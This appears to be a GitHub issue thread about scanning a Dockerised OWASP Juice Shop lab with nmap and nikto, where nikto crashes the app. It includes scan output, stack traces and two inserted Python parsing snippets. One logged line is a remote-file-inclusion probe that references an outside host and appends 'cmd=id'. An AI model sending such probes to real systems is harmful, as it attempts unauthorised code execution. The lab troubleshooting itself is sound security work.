Closed jelaiw closed 1 year ago
$ docker run --rm jelaiw/kali nmap 172.17.0.2
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 00:24 UTC
Nmap scan report for 172.17.0.2
Host is up (0.0000070s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3000/tcp open ppp
MAC Address: 02:42:AC:11:00:02 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
$ docker inspect -f '{{ .NetworkSettings.IPAddress }}' tender_engelbart
172.17.0.2
Credit to https://stackoverflow.com/questions/17157721/how-to-get-a-docker-containers-ip-address-from-the-host.
$ docker run --rm jelaiw/kali nmap -sC -sV 172.17.0.2
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 00:35 UTC
Nmap scan report for 172.17.0.2
Host is up (0.000010s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| X-Content-Type-Options: nosniff
| X-Frame-Options: SAMEORIGIN
| Feature-Policy: payment 'self'
| X-Recruiting: /#/jobs
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Fri, 20 Jan 2023 00:18:17 GMT
| ETag: W/"7c3-185cc8a5c3d"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 1987
| Vary: Accept-Encoding
| Date: Fri, 20 Jan 2023 00:36:09 GMT
| Connection: close
| <!--
| Copyright (c) 2014-2023 Bjoern Kimminich & the OWASP Juice Shop contributors.
| SPDX-License-Identifier: MIT
| --><!DOCTYPE html><html lang="en"><head>
| <meta charset="utf-8">
| <title>OWASP Juice Shop</title>
| <meta name="description" content="Probably the most modern and sophisticated insecure web application">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link id="favicon" rel="icon" type="image/x-icon" href="asset
| HTTPOptions, RTSPRequest:
| HTTP/1.1 204 No Content
| Access-Control-Allow-Origin: *
| Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
| Vary: Access-Control-Request-Headers
| Content-Length: 0
| Date: Fri, 20 Jan 2023 00:36:09 GMT
| Connection: close
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.06 seconds
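As an added example (not code from the original thread), a small parser for the readable fingerprint-strings block above: it recovers the status code and headers per probe, which already shows the service is HTTP despite nmap's "ppp?" label, and then reads one reply's headers from a defender's point of view (wildcard CORS, missing CSP, custom X- headers that disclose application detail). The embedded excerpt is a constructed shortening of the nmap output above.

```python
import re
NMAP_EXCERPT = """\
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| X-Recruiting: /#/jobs
| <!--
| SPDX-License-Identifier: MIT
| HTTPOptions, RTSPRequest:
| HTTP/1.1 204 No Content
| Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
"""  # constructed excerpt of the nmap -sC -sV fingerprint-strings output above
PROBE_RE = re.compile(r"^([A-Za-z0-9_]+(?:, [A-Za-z0-9_]+)*):$")  # e.g. "Help, NCP:"
STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})")
HEADER_RE = re.compile(r"^([A-Za-z0-9-]+): (.*)$")

def parse_fingerprint_strings(text: str) -> dict:
    # Map each probe name to the status code and headers the service replied with.
    # Any status line at all means the port speaks HTTP, whatever name nmap printed.
    results, record, in_body = {}, None, False
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()           # drop nmap's "| " / "|_ " prefix
        if m := PROBE_RE.match(line):               # probes listed together share one reply
            record, in_body = {"status": None, "headers": {}}, False
            for name in m.group(1).split(", "):
                results[name] = record
        elif record is None:
            continue                                # still in the "fingerprint-strings:" preamble
        elif m := STATUS_RE.match(line):
            record["status"] = int(m.group(1))
        elif not in_body and (m := HEADER_RE.match(line)):
            record["headers"][m.group(1).lower()] = m.group(2)
        else:
            in_body = True                          # body text; "SPDX-...: MIT" is not a header
    return results

def audit_headers(headers: dict) -> list:
    # Defender-side read of one reply: risky settings present and protections absent.
    findings = []
    if headers.get("access-control-allow-origin") == "*":
        findings.append("CORS open to any origin")
    if "content-security-policy" not in headers:
        findings.append("no Content-Security-Policy")
    findings += [f"custom header {n}: {v}" for n, v in headers.items()  # X- headers leak app detail
                 if n.startswith("x-") and n not in ("x-frame-options", "x-content-type-options")]
    return findings
```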
Nikto is crashing the latest version (14.4.0) of Juice Shop, so we are backing up to version 14.3.1 to see if that crashes too.
Here's where we get in nikto.
--- SNIP ---
+ /2.tar.lzma: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /172_17_0_2.war: Potentially interesting archive/cert file found.
+ /172_17_0_2.war: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /1721702.pem: Potentially interesting archive/cert file found.
+ /1721702.pem: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /2.egg: Potentially interesting archive/cert file found.
+ /2.egg: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /backup.egg: Potentially interesting archive/cert file found.
+ /backup.egg: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /1721702.jks: Potentially interesting archive/cert file found.
+ /1721702.jks: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ /172_17_0_2.tar.lzma: Potentially interesting archive/cert file found.
+ /172_17_0_2.tar.lzma: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /public/: This might be interesting...
+ Scan terminated: 3 error(s) and 268 item(s) reported on remote host
+ End Time: 2023-01-26 02:47:56 (GMT0) (94 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
Here are the docker logs.
--- SNIP ---
Error: Unexpected path: /api.php?t_path_core=http:/cirt.net/rfiinc.txt??&cmd=id
at /juice-shop/build/routes/angular.js:15:18
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
at Function.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)
at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
at /juice-shop/build/routes/verify.js:135:5
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
at Function.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)
at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
at /juice-shop/build/routes/verify.js:71:5
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
at Function.process_params (/juice-shop/node_modules/express/lib/router/index.js:346:12)
at next (/juice-shop/node_modules/express/lib/router/index.js:280:10)
at logger (/juice-shop/node_modules/morgan/index.js:144:5)
at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
at /juice-shop/node_modules/express/lib/router/index.js:286:9
The unexpected path above appears to be a red herring. Visiting that path directly does give the same error, but not a crash.
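An added example, not code from the thread or from Juice Shop: a triage pass over docker-log lines of the shape posted above. It groups each "Error:" line with the stack frames that follow it, extracts the paths behind the "Unexpected path" errors, and reports the first application frame (here angular.js:15) as opposed to the express framework frames, so a flood of scanner-driven errors can be separated from anything else the process logged. The log text is constructed; the EADDRINUSE entry is invented to show a non-route error.

```python
import re
from collections import Counter

# Constructed docker-log excerpt modelled on the Express stack traces posted above.
DOCKER_LOG = """\
Error: Unexpected path: /api.php?t_path_core=http:/cirt.net/rfiinc.txt??&cmd=id
    at /juice-shop/build/routes/angular.js:15:18
    at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
    at trim_prefix (/juice-shop/node_modules/express/lib/router/index.js:328:13)
Error: Unexpected path: /backup.egg
    at /juice-shop/build/routes/angular.js:15:18
    at Layer.handle [as handle_request] (/juice-shop/node_modules/express/lib/router/layer.js:95:5)
Error: Unexpected path: /1721702.pem
    at /juice-shop/build/routes/angular.js:15:18
Error: listen EADDRINUSE: address already in use :::3000
    at Server.setupListenHandle [as _listen2] (node:net:1485:16)
"""

ERROR_RE = re.compile(r"^Error: (?P<msg>.*)$")
FRAME_RE = re.compile(r"^\s+at .*?(?P<file>[^\s()]+):(?P<line>\d+):\d+\)?$")
PATH_RE = re.compile(r"^Unexpected path: (?P<path>\S+)$")

def parse_errors(log: str) -> list:
    # Group each "Error:" line with the "at ..." frames that follow it.
    errors = []
    for line in log.splitlines():
        if m := ERROR_RE.match(line):
            errors.append({"message": m.group("msg"), "frames": []})
        elif errors and (m := FRAME_RE.match(line)):
            errors[-1]["frames"].append(f"{m.group('file')}:{m.group('line')}")
    return errors

def origin_frame(error: dict):
    # First frame inside the application's own code, skipping node_modules and node internals.
    for frame in error["frames"]:
        if "node_modules" not in frame and not frame.startswith("node:"):
            return frame
    return None

def triage(log: str) -> dict:
    # Summarise: total errors, the paths behind "Unexpected path", and where each error originates.
    errors = parse_errors(log)
    unexpected = [m.group("path") for e in errors if (m := PATH_RE.match(e["message"]))]
    origins = Counter(origin_frame(e) for e in errors)
    return {"errors": len(errors), "unexpected_paths": unexpected, "origins": origins}
```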
Notes